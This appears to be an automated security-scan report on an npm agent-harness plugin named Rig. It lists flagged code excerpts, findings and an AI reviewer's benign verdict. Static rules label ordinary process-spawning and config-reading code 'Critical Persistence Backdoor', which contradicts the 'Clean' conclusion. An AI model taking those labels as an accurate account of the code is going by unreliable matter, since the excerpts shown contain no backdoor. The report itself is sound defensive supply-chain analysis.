AI Security Review
scanned 2d ago · by lpm-firewall-aiNo confirmed malicious attack surface was established. The package is an agent-harness plugin with expected file writes, process spawning, native runtime tools, and limited user-invoked network access.
Static reason
High-risk behavior combination matched malicious policy.
Trigger
User imports/loads the Rig plugin or invokes Rig CLI/runtime commands.
Impact
Can modify Rig/agent runtime configuration and run controlled tools when explicitly used, but no unconsented install-time behavior or exfiltration was found.
Mechanism
Package-aligned agent runtime provisioning and tool materialization.
Rationale
Static inspection found high-risk primitives, but they are aligned with the declared Rig agent-harness purpose and are reached through explicit plugin capabilities or CLI/runtime entrypoints. I found no lifecycle execution, credential harvesting with exfiltration, persistence backdoor, destructive behavior, or unconsented AI-agent control-surface mutation.
Evidence
package.jsondist/src/plugin.jsdist/src/agent-harness/rig-agent.jsdist/src/session-hook-materializer-service.jsdist/src/pi-command.jsdist/src/pi-settings-materializer.jsdist/src/skill-materializer.jsdist/src/tooling/shell-tools.jsnative/linux-arm64/rig-shellnative/linux-arm64/rig-tools.claude/settings.json.pi/settings.json.pi/skills/*/SKILL.md.rig/state/pi-managed-packages.json.rig/runtime/handoffs/*.jsonruntime home .ssh/known_hostsruntime bin/tool paths
Network endpoints1
registry.npmjs.org/-/v1/search
Decision evidence
public snapshotAI called this Clean at 87.0% confidence as Benign with medium false-positive risk.
Evidence for block
- Ships native helper binaries under native/*/rig-shell and rig-tools.
- Runtime helpers can spawn controlled shells and materialize tool binaries when invoked.
- Writes provider-managed runtime files such as .claude/settings.json, .pi/settings.json, .rig/state, and runtime known_hosts.
Evidence against
- package.json has no install/preinstall/postinstall lifecycle hooks.
- Main export dist/src/plugin.js registers a Rig provider plugin; dangerous primitives are exposed as Rig CLI/capability actions, not import-time execution.
- Network use found is limited to npm registry search in rig pi search and run steering via caller-provided serverUrl.
- Secret handling resolves expected runtime API keys into Rig runtime env/defines; no source exfiltration endpoint found.
- Session hook and Pi writes are plugin/config-driven and marked/managed, preserving operator entries.
- Native binary strings show Rig workspace/tool enforcement terms, with no obvious downloader or C2 strings.
Behavioral surface
ChildProcessEnvironmentVarsFilesystemNetwork
HighEntropyStringsUrlStrings
NoLicense
Source & flagged code
3 flagged · loading sourcedist/src/agent-harness/rig-agent.jsView file
15const candidates = [
L16: process.env.RIG_CONTROLLED_BASH_BIN?.trim() || "",
L17: resolve(layout.binDir, "controlled-bash"),
...
L29: async function runControlledBash(args, options) {
L30: const projectRoot = process.env.RIG_HOST_PROJECT_ROOT?.trim() || process.env.PROJECT_RIG_ROOT?.trim() || process.env.RIG_TASK_WORKSPACE?.trim() || process.cwd() || options.projectR...
L31: const controlled = resolveControlledBash(projectRoot);
...
L38: stdin: "inherit",
L39: stdout: "inherit",
L40: stderr: "inherit",
...
L169: try {
L170: const parsed = JSON.parse(readFileSync(path, "utf-8"));
L171: return parsed && typeof parsed === "object" && !Array.isArray(parsed) ? parsed : null;
Critical
Persistence Backdoor
Source writes persistence or remote-access backdoor material.
dist/src/agent-harness/rig-agent.jsView on unpkg · L1515Trigger-reachable chain: manifest.exports -> dist/src/agent-harness/rig-agent.js
L15: const candidates = [
L16: process.env.RIG_CONTROLLED_BASH_BIN?.trim() || "",
L17: resolve(layout.binDir, "controlled-bash"),
...
L29: async function runControlledBash(args, options) {
L30: const projectRoot = process.env.RIG_HOST_PROJECT_ROOT?.trim() || process.env.PROJECT_RIG_ROOT?.trim() || process.env.RIG_TASK_WORKSPACE?.trim() || process.cwd() || options.projectR...
L31: const controlled = resolveControlledBash(projectRoot);
...
L38: stdin: "inherit",
L39: stdout: "inherit",
L40: stderr: "inherit",
...
L169: try {
L170: const parsed = JSON.parse(readFileSync(path, "utf-8"));
L171: return parsed && typeof parsed === "object" && !Array.isArray(parsed) ? parsed : null;
Critical
Trigger Reachable Dangerous Capability
A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.
dist/src/agent-harness/rig-agent.jsView on unpkg · L15native/linux-arm64/rig-shellView file
•path = native/linux-arm64/rig-shell
kind = native_binary
sizeBytes = 3029392
magicHex = [redacted]
Medium
Findings
2 Critical4 Medium4 Low
CriticalPersistence Backdoordist/src/agent-harness/rig-agent.js
CriticalTrigger Reachable Dangerous Capabilitydist/src/agent-harness/rig-agent.js
MediumNetwork
MediumEnvironment Vars
MediumShips Native Binarynative/linux-arm64/rig-shell
MediumStructural Risk Force Deep Review
LowFilesystem
LowHigh Entropy Strings
LowUrl Strings
LowNo License